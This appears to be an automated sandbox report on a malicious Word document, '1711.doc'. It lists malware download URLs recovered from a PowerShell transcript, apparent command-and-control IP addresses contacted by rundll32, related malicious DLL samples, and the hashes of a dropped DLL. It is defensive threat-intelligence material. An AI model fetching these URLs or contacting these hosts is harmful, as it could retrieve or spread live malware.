                                                                                                  https://devnull.onenote.com228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                                                    high
                                                                                                    https://messaging.office.com/228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                                                      high
                                                                                                      http://crl.micrpowershell.exe, 00000005.00000003.309254161.0000000007861000.00000004.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 00000008.00000002.309804493.000001C41943C000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.drtrue
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://168.197.250.14/563209-4053062332-1002rundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                                                          high
                                                                                                          https://skyapi.live.net/Activity/228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://168.197.250.14/Wrundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          http://pesterbdd.com/images/Pester.pngppowershell.exe, 00000005.00000002.339756684.000000000484F000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://api.cortana.ai228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://visio.uservoice.com/forums/368202-visio-on-devices228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                                                            high
                                                                                                            https://staging.cortana.ai228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://onedrive.live.com/embed?228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                                                              high
                                                                                                              https://augloop.office.com228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                                                                high
                                                                                                                https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 00000008.00000003.309189585.000001C419456000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 00000008.00000003.309005184.000001C419440000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://api.diagnostics.office.com228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                                                                        high
                                                                                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000008.00000002.309911672.000001C41945E000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          https://store.office.de/addinstemplate228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                                                                            high
                                                                                                                            https://wus2.pagecontentsync.228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHL2qrundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://api.powerbi.com/v1.0/myorg/datasets228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                                                                              high
                                                                                                                              https://51.178.61.60/Erundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/PowerShell_transcript.813435.2FeLMNmk.20211122110119.txt.5.drtrue
                                                                                                                              • Avira URL Cloud: malware
                                                                                                                              unknown
                                                                                                                              https://168.197.250.14:80/kvToeLsGeFZqJGKzCOcoHxsHCGcCDtetHLrundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://cortana.ai/api228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                                                                              • URL Reputation: safe
                                                                                                                              unknown
                                                                                                                              https://168.197.250.14/hrundll32.exe, 00000015.00000002.535612360.0000000003095000.00000004.00000001.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://activity.windows.comsvchost.exe, 00000006.00000002.533539808.0000020B61E43000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                https://45.79.33.48:8080/arundll32.exe, 00000015.00000002.535367737.000000000304B000.00000004.00000020.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://api.diagnosticssdf.office.com228B70BA-96BF-49A2-BAE9-6D7972869BA5.0.drfalse
                                                                                                                                  high

                                                                                                                                  Contacted IPs

                                                                                                                                  • No. of IPs < 25%
                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                  • 75% < No. of IPs

                                                                                                                                  Public

                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                  207.148.81.119
                                                                                                                                  unknownUnited States
                                                                                                                                  20473AS-CHOOPAUStrue
                                                                                                                                  196.44.98.190
                                                                                                                                  unknownGhana
                                                                                                                                  327814EcobandGHtrue
                                                                                                                                  78.46.73.125
                                                                                                                                  unknownGermany
                                                                                                                                  24940HETZNER-ASDEtrue
                                                                                                                                  37.59.209.141
                                                                                                                                  unknownFrance
                                                                                                                                  16276OVHFRtrue
                                                                                                                                  85.214.67.203
                                                                                                                                  unknownGermany
                                                                                                                                  6724STRATOSTRATOAGDEtrue
                                                                                                                                  191.252.103.16
                                                                                                                                  unknownBrazil
                                                                                                                                  27715LocawebServicosdeInternetSABRtrue
                                                                                                                                  45.79.33.48
                                                                                                                                  unknownUnited States
                                                                                                                                  63949LINODE-APLinodeLLCUStrue
                                                                                                                                  54.37.228.122
                                                                                                                                  unknownFrance
                                                                                                                                  16276OVHFRtrue
                                                                                                                                  185.148.169.10
                                                                                                                                  unknownGermany
                                                                                                                                  44780EVERSCALE-ASDEtrue
                                                                                                                                  142.4.219.173
                                                                                                                                  unknownCanada
                                                                                                                                  16276OVHFRtrue
                                                                                                                                  54.38.242.185
                                                                                                                                  unknownFrance
                                                                                                                                  16276OVHFRtrue
                                                                                                                                  195.154.146.35
                                                                                                                                  unknownFrance
                                                                                                                                  12876OnlineSASFRtrue
                                                                                                                                  195.77.239.39
                                                                                                                                  unknownSpain
                                                                                                                                  60493FICOSA-ASEStrue
                                                                                                                                  50.62.141.15
                                                                                                                                  alfaofarms.comUnited States
                                                                                                                                  26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                                                  78.47.204.80
                                                                                                                                  unknownGermany
                                                                                                                                  24940HETZNER-ASDEtrue
                                                                                                                                  72.167.40.83
                                                                                                                                  thepilatesstudionj.comUnited States
                                                                                                                                  26496AS-26496-GO-DADDY-COM-LLCUStrue
                                                                                                                                  168.197.250.14
                                                                                                                                  unknownArgentina
                                                                                                                                  264776OmarAnselmoRipollTDCNETARtrue
                                                                                                                                  51.178.61.60
                                                                                                                                  unknownFrance
                                                                                                                                  16276OVHFRtrue
                                                                                                                                  177.72.80.14
                                                                                                                                  unknownBrazil
                                                                                                                                  262543NewLifeFibraBRtrue
                                                                                                                                  66.42.57.149
                                                                                                                                  unknownUnited States
                                                                                                                                  20473AS-CHOOPAUStrue
                                                                                                                                  37.44.244.177
                                                                                                                                  unknownGermany
                                                                                                                                  47583AS-HOSTINGERLTtrue
                                                                                                                                  51.210.242.234
                                                                                                                                  unknownFrance
                                                                                                                                  16276OVHFRtrue

                                                                                                                                  Private

                                                                                                                                  IP
                                                                                                                                  192.168.2.1
                                                                                                                                  127.0.0.1

                                                                                                                                  General Information

                                                                                                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                  Analysis ID:526179
                                                                                                                                  Start date:22.11.2021
                                                                                                                                  Start time:11:00:12
                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                  Overall analysis duration:0h 10m 33s
                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                  Report type:light
                                                                                                                                  Sample file name:1711.doc
                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                  Number of analysed new started processes analysed:26
                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                  Technologies:
                                                                                                                                  • HCA enabled
                                                                                                                                  • EGA enabled
                                                                                                                                  • HDC enabled
                                                                                                                                  • GSI enabled (VBA)
                                                                                                                                  • AMSI enabled
                                                                                                                                  Analysis Mode:default
                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                  Detection:MAL
                                                                                                                                  Classification:mal100.troj.expl.evad.winDOC@27/26@2/24
                                                                                                                                  EGA Information:
                                                                                                                                  • Successful, ratio: 66.7%
                                                                                                                                  HDC Information:
                                                                                                                                  • Successful, ratio: 13.2% (good quality ratio 11.7%)
                                                                                                                                  • Quality average: 68.1%
                                                                                                                                  • Quality standard deviation: 31%
                                                                                                                                  HCA Information:
                                                                                                                                  • Successful, ratio: 65%
                                                                                                                                  • Number of executed functions: 0
                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                  Cookbook Comments:
                                                                                                                                  • Adjust boot time
                                                                                                                                  • Enable AMSI
                                                                                                                                  • Found application associated with file extension: .doc
                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                  • Attach to Office via COM
                                                                                                                                  • Scroll down
                                                                                                                                  • Close Viewer
                                                                                                                                  Warnings:
                                                                                                                                  Show All
                                                                                                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, HxTsr.exe, RuntimeBroker.exe, backgroundTaskHost.exe
                                                                                                                                  • TCP Packets have been reduced to 100
                                                                                                                                  • Excluded IPs from analysis (whitelisted): 52.109.88.177, 52.109.12.24, 52.109.12.23, 23.35.236.56, 40.112.88.60, 20.54.110.249, 40.91.112.76
                                                                                                                                  • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, prod-w.nexus.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, nexus.officeapps.live.com, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 6468 because it is empty
                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                  Simulations

                                                                                                                                  Behavior and APIs

                                                                                                                                  TimeTypeDescription
                                                                                                                                  11:01:18API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                  11:01:38API Interceptor29x Sleep call for process: powershell.exe modified
                                                                                                                                  11:02:33API Interceptor1x Sleep call for process: MpCmdRun.exe modified

                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                  IPs

                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                  207.148.81.119GQwxmGZFvtg.dllGet hashmaliciousBrowse
                                                                                                                                    wNjqkrm8pH.dllGet hashmaliciousBrowse
                                                                                                                                      5YO8hZg21O.dllGet hashmaliciousBrowse
                                                                                                                                        dUGnMYeP1C.dllGet hashmaliciousBrowse
                                                                                                                                          yFAXc9z51V.dllGet hashmaliciousBrowse
                                                                                                                                            9fC0as7YLE.dllGet hashmaliciousBrowse
                                                                                                                                              FIyE6huzxV.dllGet hashmaliciousBrowse
                                                                                                                                                V0gZWRXv8d.dllGet hashmaliciousBrowse
                                                                                                                                                  t5EuQW2GUF.dllGet hashmaliciousBrowse
                                                                                                                                                    uh1WyesPlh.dllGet hashmaliciousBrowse
                                                                                                                                                      8rryPzJR1p.dllGet hashmaliciousBrowse
                                                                                                                                                        a65FgjVus4.dllGet hashmaliciousBrowse
                                                                                                                                                          bWjYh6H8wk.dllGet hashmaliciousBrowse
                                                                                                                                                            ZJOHKItBoJ.dllGet hashmaliciousBrowse
                                                                                                                                                              eyPPiz3W6u.dllGet hashmaliciousBrowse
                                                                                                                                                                HjYSwxqyUn.dllGet hashmaliciousBrowse
                                                                                                                                                                  f47YPsvRI3.dllGet hashmaliciousBrowse
                                                                                                                                                                    2n64VXT08V.dllGet hashmaliciousBrowse
                                                                                                                                                                      qUr4bXsweR.dllGet hashmaliciousBrowse
                                                                                                                                                                        52O6evfqQT.dllGet hashmaliciousBrowse
                                                                                                                                                                          196.44.98.190GQwxmGZFvtg.dllGet hashmaliciousBrowse
                                                                                                                                                                            wNjqkrm8pH.dllGet hashmaliciousBrowse
                                                                                                                                                                              5YO8hZg21O.dllGet hashmaliciousBrowse
                                                                                                                                                                                dUGnMYeP1C.dllGet hashmaliciousBrowse
                                                                                                                                                                                  yFAXc9z51V.dllGet hashmaliciousBrowse
                                                                                                                                                                                    9fC0as7YLE.dllGet hashmaliciousBrowse
                                                                                                                                                                                      FIyE6huzxV.dllGet hashmaliciousBrowse
                                                                                                                                                                                        V0gZWRXv8d.dllGet hashmaliciousBrowse
                                                                                                                                                                                          t5EuQW2GUF.dllGet hashmaliciousBrowse
                                                                                                                                                                                            uh1WyesPlh.dllGet hashmaliciousBrowse
                                                                                                                                                                                              8rryPzJR1p.dllGet hashmaliciousBrowse
                                                                                                                                                                                                a65FgjVus4.dllGet hashmaliciousBrowse
                                                                                                                                                                                                  bWjYh6H8wk.dllGet hashmaliciousBrowse
                                                                                                                                                                                                    ZJOHKItBoJ.dllGet hashmaliciousBrowse
                                                                                                                                                                                                      eyPPiz3W6u.dllGet hashmaliciousBrowse
                                                                                                                                                                                                        HjYSwxqyUn.dllGet hashmaliciousBrowse
                                                                                                                                                                                                          f47YPsvRI3.dllGet hashmaliciousBrowse
                                                                                                                                                                                                            2n64VXT08V.dllGet hashmaliciousBrowse
                                                                                                                                                                                                              qUr4bXsweR.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                52O6evfqQT.dllGet hashmaliciousBrowse

                                                                                                                                                                                                                  Domains

                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                  ASN

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                  AS-CHOOPAUSY5EGM7BygT.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 216.128.137.31
                                                                                                                                                                                                                  Hilix.arm7Get hashmaliciousBrowse
                                                                                                                                                                                                                  • 104.238.167.225
                                                                                                                                                                                                                  sora.x86Get hashmaliciousBrowse
                                                                                                                                                                                                                  • 149.28.66.6
                                                                                                                                                                                                                  XxMcevQr2ZGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 44.174.108.65
                                                                                                                                                                                                                  f4gxrcTDkV.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 149.28.253.196
                                                                                                                                                                                                                  SOO6hKZ7M0.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 149.28.253.196
                                                                                                                                                                                                                  BVxT3jA2K0.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 216.128.137.31
                                                                                                                                                                                                                  SOO6hKZ7M0.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 149.28.253.196
                                                                                                                                                                                                                  f4gxrcTDkV.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 149.28.253.196
                                                                                                                                                                                                                  wmwL0AmWha.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 149.28.253.196
                                                                                                                                                                                                                  AUurXinKE2.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 149.28.253.196
                                                                                                                                                                                                                  yeLdmaW3oj.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 216.128.137.31
                                                                                                                                                                                                                  7WXfPYaWt2.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 216.128.137.31
                                                                                                                                                                                                                  b0sJQVW62pGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 78.141.232.141
                                                                                                                                                                                                                  7u0Gj7aYfG.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 216.128.137.31
                                                                                                                                                                                                                  I6erIt5Uil.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 149.28.253.196
                                                                                                                                                                                                                  I6erIt5Uil.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 149.28.253.196
                                                                                                                                                                                                                  GkQngTTbVE.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 216.128.137.31
                                                                                                                                                                                                                  malware.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 45.77.0.96
                                                                                                                                                                                                                  BPjUXSEwuL.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 149.28.253.196
                                                                                                                                                                                                                  EcobandGHn6J7QJs4bk.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 196.44.109.73
                                                                                                                                                                                                                  GQwxmGZFvtg.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 196.44.98.190
                                                                                                                                                                                                                  wNjqkrm8pH.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 196.44.98.190
                                                                                                                                                                                                                  5YO8hZg21O.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 196.44.98.190
                                                                                                                                                                                                                  dUGnMYeP1C.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 196.44.98.190
                                                                                                                                                                                                                  yFAXc9z51V.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 196.44.98.190
                                                                                                                                                                                                                  9fC0as7YLE.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 196.44.98.190
                                                                                                                                                                                                                  FIyE6huzxV.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 196.44.98.190
                                                                                                                                                                                                                  V0gZWRXv8d.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 196.44.98.190
                                                                                                                                                                                                                  t5EuQW2GUF.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 196.44.98.190
                                                                                                                                                                                                                  uh1WyesPlh.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 196.44.98.190
                                                                                                                                                                                                                  8rryPzJR1p.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 196.44.98.190
                                                                                                                                                                                                                  a65FgjVus4.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 196.44.98.190
                                                                                                                                                                                                                  bWjYh6H8wk.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 196.44.98.190
                                                                                                                                                                                                                  ZJOHKItBoJ.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 196.44.98.190
                                                                                                                                                                                                                  eyPPiz3W6u.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 196.44.98.190
                                                                                                                                                                                                                  HjYSwxqyUn.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 196.44.98.190
                                                                                                                                                                                                                  f47YPsvRI3.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 196.44.98.190
                                                                                                                                                                                                                  2n64VXT08V.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 196.44.98.190
                                                                                                                                                                                                                  qUr4bXsweR.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 196.44.98.190

                                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                                                  51c64c77e60f3980eea90869b68c58a8cs.exeGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 51.178.61.60
                                                                                                                                                                                                                  0MGLPJiSa5.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 51.178.61.60
                                                                                                                                                                                                                  0MGLPJiSa5.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 51.178.61.60
                                                                                                                                                                                                                  bbyGAgHI9O.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 51.178.61.60
                                                                                                                                                                                                                  Vs6ZDk0LMC.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 51.178.61.60
                                                                                                                                                                                                                  sTh52oTZDh.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 51.178.61.60
                                                                                                                                                                                                                  loveTubeLike.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 51.178.61.60
                                                                                                                                                                                                                  2SR3psYDHQ.jsGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 51.178.61.60
                                                                                                                                                                                                                  GQwxmGZFvtg.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 51.178.61.60
                                                                                                                                                                                                                  Fuutbqvhmc.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 51.178.61.60
                                                                                                                                                                                                                  wNjqkrm8pH.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 51.178.61.60
                                                                                                                                                                                                                  5YO8hZg21O.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 51.178.61.60
                                                                                                                                                                                                                  dUGnMYeP1C.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 51.178.61.60
                                                                                                                                                                                                                  yFAXc9z51V.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 51.178.61.60
                                                                                                                                                                                                                  9fC0as7YLE.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 51.178.61.60
                                                                                                                                                                                                                  FIyE6huzxV.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 51.178.61.60
                                                                                                                                                                                                                  V0gZWRXv8d.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 51.178.61.60
                                                                                                                                                                                                                  t5EuQW2GUF.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 51.178.61.60
                                                                                                                                                                                                                  uh1WyesPlh.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 51.178.61.60
                                                                                                                                                                                                                  8rryPzJR1p.dllGet hashmaliciousBrowse
                                                                                                                                                                                                                  • 51.178.61.60

                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                  C:\ProgramData\13791789.dll
                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):485376
                                                                                                                                                                                                                  Entropy (8bit):7.178849265977026
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12288:bdv8jkvzqZvv2wLB4mTi12yD88kYwZ1h1:b2Zvv2cTTi1v0Z1h
                                                                                                                                                                                                                  MD5:6ED0F0B0046573CFBA56C98152B44F28
                                                                                                                                                                                                                  SHA1:53FC583339C441DFFBFCF2C2F1F660C1CAD96714
                                                                                                                                                                                                                  SHA-256:A84F4C76EF86D165088979CB91506B65C3D84CB92386E3AA68EABA4EFE0C9B5E
                                                                                                                                                                                                                  SHA-512:5DEF2C24FBA65FB8CADE6954609F29DDC175DB1FD1A797BEFF68C2FCDA44E8E7E751294498806191120807EBC07948CA4EE9F23DE402959CD0EE9DD4FF263AEA
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                  • Antivirus: Metadefender, Detection: 34%, Browse
                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 81%
                                                                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................................................................PE..L....L.a...........!................&X....................................................@.......................................... ...D...................p...3......................................@............................................text............................... ..`.rdata...<.......>..................@..@.data...,%..........................@....rsrc....D... ...F..................@..@.reloc...3...p...4...4..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  File Type:MPEG-4 LOAS
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                                  Entropy (8bit):0.24858969187891947
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU4X:BJiRdwfu2SRU4X
                                                                                                                                                                                                                  MD5:DD06E4E46FED0F4FF0E7F22FDE2F4D31
                                                                                                                                                                                                                  SHA1:7C97D38EBD4C262A598C1E4C5332C840B65FC479
                                                                                                                                                                                                                  SHA-256:E024B0D15BE41E914C20F1031C7375E799A95B6411D94B1DD0B79F3C835C1350
                                                                                                                                                                                                                  SHA-512:C87B3F7AD785C83037505981A3D86CDE2329F0B7C6DC7F2AB22A17F11746007E06B4FCA26DD96D51293E4C18B5D729580CCE4E22D94083B8D330028CF797EB8D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x985cf3fb, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):786432
                                                                                                                                                                                                                  Entropy (8bit):0.250662044507451
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:M+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:TSB2nSB2RSjlK/+mLesOj1J2
                                                                                                                                                                                                                  MD5:9B95D532A2A3CCF486623DBBC6331B0B
                                                                                                                                                                                                                  SHA1:72CE33EB727A002D41BD78A0841A313C775C651C
                                                                                                                                                                                                                  SHA-256:D8A2964C164F32BA48DBFEA35AD0CA47E8EBFAECF946663022C8805C3203E47A
                                                                                                                                                                                                                  SHA-512:E1185044CF93EBA08BA67E2526097ED9FC953B6B5BD0F3E3C24E932B411DE1F3F0F7DB4B2C21FFD8902FD3D79CCF0CEC2EBEB6731FDA3D4DC1AD19CF02AB8999
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview: .\..... ................e.f.3...w........................&..........w.......y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w.......................................................................................................................................................................................................................................Z......y.................C.UK.....y..........................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                                  Entropy (8bit):0.07601057257993825
                                                                                                                                                                                                                  Encrypted:false
